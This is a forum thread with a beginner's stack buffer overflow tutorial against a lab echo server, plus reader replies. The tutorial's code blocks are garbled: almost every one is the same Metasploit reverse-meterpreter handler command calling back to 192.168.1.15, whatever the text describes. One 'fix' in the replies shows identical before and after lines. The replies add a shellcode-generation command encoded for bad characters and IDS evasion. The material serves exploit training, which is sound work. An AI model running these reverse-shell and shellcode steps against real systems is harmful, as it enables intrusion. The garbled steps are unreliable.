Matu's exploit guide!

[matugm 65]

Hello guys! I wanted to do a little guide on exploitation to complete on what is teached on the course so I assume you know the basics already,I hope you find it useful.

Target download: server.exe

Knowing our target

Ok so we have this program called "server.exe" which we have been told to audit,only thing we know about it is that a this is custom application that is run on one of the our customer servers,so let's run it ourselves and see what it does.

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

Interesting,so let's conect to it using netcat

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

So it looks like we have a custom echo server,now why would anyone actually needs this? no one knows but this information should be enough to start with our actual audit.

Testing for overflows

Now we are gonna drop our application into olly and leave it listening and we are gonna make a python script that will eventually become our exploit,but let's not get too far ahead of ourselves first we need to check if there is a vulnerability,so our initial script will be something like this

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

It's very simple,we create a buffer with 200 A,now this could be any letter it dosn't matter,we will feed this buffer to our target application to try and make it break and since olly is attached to it we will be able to see some interesting informaion,now let's do this!

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

Oooops! looks like we didn't hit it hard enough! So let's give it what it wants! We are now going to use a bigger buffer A * 500

Now it will crash and we check Olly,

So this means it tried to read 41414141 (AAAA in hex) as it's next instruction to execute (EIP)

there is a very good chance we can control the execution flow and make it do whatever we want in the context of the user that the application is runing under(meaning that if it runs with admin priv we pretty much owned the box,otherwise we can still get a shell back but with lower privileges).

Finding the offset

Next step,now we need to find the offset this is the number of bytes we need to reach and overwrite the return address,the best way to do this is using a metapsloit tool called patter_create.rb and pattern_offset.rb so this tool is located in backtrack in the directory

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

We issue this command

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

What we get back is a 500 byte string that we will now feed into our target instead of the 500 A so we change our buffer variable to this

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

And now we restart the server (ctrl+2 to restart and F9 to run it on Olly) and launch our script again,it will crash,let's look at Olly

We will take this value into the pattern_offset.rb tool and it will give us our offset,easy enough?

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

Now lets test this,we are gonna empty our buffer variable and this time we are gonna use A's again but instead of a random number we will be using our offset and test it,our buffer variable should now look something like this

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

Notice we now have B and C these are the place holders for our return address and shellcode,respectively,if all goes right now we should be able to crash the target again and the value of EIP should be 42424242 (BBBB in hex)

Getting a return address

What we need now is a return adress that will make the execution flow jump into our shellcode,if you watch olly with the last crash and 'Follow in dump' the ESP register,you will see thats where exactly our C's start and remember this is our placeholder for the shellcode but to get there first we need an adress with a JMP ESP instruction or equivalent (call,pop ret) so what we can do to find this adress is load kernel32.dll (you can also use user32.dll most of the time and it has way more adresses available) onto Olly or IDA and look for the instruction that way,or even better use a proper tool for the job there is 2 good tools for this, one is included with the metasploit framework the tool is called 'msfpescan'

The command to find a JMP ESP instruction with this tool is

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

There other tool is findjmp2 which you can download here.

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

You should be able to use any as long as it dosn't contain any null characters (00) because that would break our exploit,remember a null character terminates a string.

Now we are gonna test this.

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

Let's go to olly and go to this memory location (ctrl+g) and put a breakpoint here (F2),restart the server and launch our script,we should land at the JMP ESP instruction.

And if we step in we should see our C's,now we are ready to change these for something useful!

Creating some shellcode

We are getting close,now we just need to replace our shellcode placeholder for a real one,I assume you already know what a shellcode is but small recap here,basically is a piece of machine code that will return us a shell or do anything we want like adding a user on the system,you can make these by hand but I wont cover that here,so no problem metasploit to the rescue again! We are going to use the msfpayload and msfencode tools,issue this command:

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

Please notice you will need to adjust the ip address to the one of your backtrack machine,so we are telling msfpayload to create a reverse meterpreter shellcode for us with these parameters and then we pipe it throught msfencode which will encode our shellcode mainly for 2 reasons,the most important is getting rid of characters that would break our shellcode (the -b option) and getting past some IDS.

Exploit time!

At this point our final exploit should look something like this:

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

Start a payload handler issuing this command:

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

And if everything went right you should get a session,finally the two main problems you will run into while working on a exploit:bad return address,remember every SP and language will have different system libs (user32,kernel32...) so make sure you get an address for the correct windows version and language,and bad chars in the shellcode,I actually wanted to bash my head against a wall so many times with this one,so if everything works right until the point of using real shellcode this is the most probable case.

Please comment/suggestions etc. are aprecciated,have fun!

--------------------------------------------------------------------

[Armando 156]

Loving this kind of thread...

[matugm 65]

Yeah would be nice if more ppl would contribute... anyway I feel like im the only person checking this forum daily

[Bluntlee 1]

thanks for sharing your work, I check the forum almost daily, but I am still in the early stages of understanding everything.

[ghancock 0]

Awesome post.

Thanks, keep them coming!!

glenn

[robertray 41]

Again, I think that a seperate forum perhaps for custom tutorials for these kind of posts would be excellent.

Still not this far ahead though so I will wait to test it out. But thanks for the efforts I really appreciate active members :-)

[Destron 0]

Very nice tutorial here!!! Keep up the good work!!!

[robertray 41]

Bit of a bump. Still think this would be cool as a sticky. I mean to come back to try this out.

[t3rm1t 23]

Hello Matugm.

Awesome guide, but when I simulation this situation on 2 virtualbox machines one of them is winxp sp3 and other is BT.

It is fully worked until moment when I send the shellcode: ollydbg send "Access violation when reading [0000028C]..." and no shell in mfs exactly.

Return`s address is right (I checked this with breakpoint in olly). May be not enough memory for shell or bad coding with msfencode ?

Any ideas?

[matugm 65]

umm,there should be enough space for a meterpreter,anyway you might want to try with a simpler payload first,like executing calc.exe,if you follow along the execution with ollydbg and the only problem is the shellcode it might be a encoding issue,also space but if I remember right this is not the case.

calc.exe shellcode:

msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d' -e x86/shikata_ga_nai -t c

[t3rm1t 23]

hmm. With calc shellcode is not worked too:

"Access violation when reading [00000235]..."

I think this another problem then lack of memory. May be is Virtualbox feature in architecture . I`ll try this in a live host.

Any ideas?

[matugm 65]

can you post your exploit please http://pastie.org/

[t3rm1t 23]

can you post your exploit please http://pastie.org/

Here it is : http://pastie.org/private/ozumdwcylschkh5mrq

When 10.1.1.15 - victim Ip address and payload - cmd calc . Also I check this locally (change to 127.0.0.1 and trying from Victim, not effect).

[matugm 65]

t3rmlt I have tested your exploit and I noticed that after the jmp esp you dont land on the NOPs+shellcode,then paying closer attention to your code I noticed you missed the x on the nops

buf += '\x90' * 16

and the correct is

buf += '\x90' * 16

after this change your exploit works

this is how it should look when you jump to esp...

[t3rm1t 23]

You are right. it is the stupid omission.

Thanks. It is working fine now

[robertray 41]

Excellent.

[illumina 1]

Hi matugm - first up, thanks for the tutorial. Although the English was a little hard to understand in certain places, it is overall a very easy to follow tutorial. I have read through this, and understand the theory, but haven't yet tried it in practice. I only have one question for you: When you put in the shellcode, you changed the 3rd buffer from 'C' * 500 to '\x90' * 16 - why is this? This may be obvious to me if I actually follow the tutorial in practice, or it may not be, but either way I just wanted to clear that up. Thank you again for such a wonderful beginners tutorial to exploits!

[matugm 65]

good question,'\x90' * 16 is a "nop sled" basically this means your code execution will land in between a bunch of NOP instructions and since they do nothing the execution of the program will just flow to the next instruction after the end of the sled,which should be your shellcode,hope this clears your doubt

[illumina 1]

good question,'\x90' * 16 is a "nop sled" basically this means your code execution will land in between a bunch of NOP instructions and since they do nothing the execution of the program will just flow to the next instruction after the end of the sled,which should be your shellcode,hope this clears your doubt

Makes perfect sense Thanks for clearing that up for me!

[Ninjastyle971 0]

Awesome tutorial dude, i'll try it !! Thanks for the share

[schuydorsey 51]

Hey mat, great tutorial. Quick question.

Upon learning buffer overflows more in depth, I see the NULL character can be a real problem in your shell code as it would terminate the string.

How does one determine what all of the null characters are? Is it OS or application specific?

[matugm 65]

The null character is \x00 which is the first character in the ascii table, what you are looking for is generally known as "bad characters" those are characters that are either filtered or have a special meaning for the application, so it depends on the program you are working on.

For example think of an app that reads in a single word and ignore everything after a space, so in this case if you shellcode contained a space character (\x20) in the middle it would break because not all the shellcode would be copied into the buffer, here is a pretty good article about this:

http://insidetrust.blogspot.com/2011/02/using-backtrack-to-spot-bad-characters.html

http://en.wikibooks.org/wiki/Metasploit/WritingWindowsExploit#Dealing_with_badchars

[Patrick 6]

From hacking to cracking, cool!

As always i am a little lite to respond... but....Nice tut, i will play with Ollydbg and server.exe a little(as soon as i tame Symantec Endpoint Protection)

[Omega 15]

Thanks Sir, I got my reverse connection successfully and Thank you very much for posting this.

Please post some Buffer overflow challenges I like to improve my knowledge in software exploitation.

[schuydorsey 51]

Thanks Sir, I got my reverse connection successfully and Thank you very much for posting this.

Please post some Buffer overflow challenges I like to improve my knowledge in software exploitation.

I like that idea.. perhaps we should find some good challenges for this. On that note, have you tried a go at the new Gold cert? You just may like it...

Also.. perhaps you should update your location to something Kali specific :-D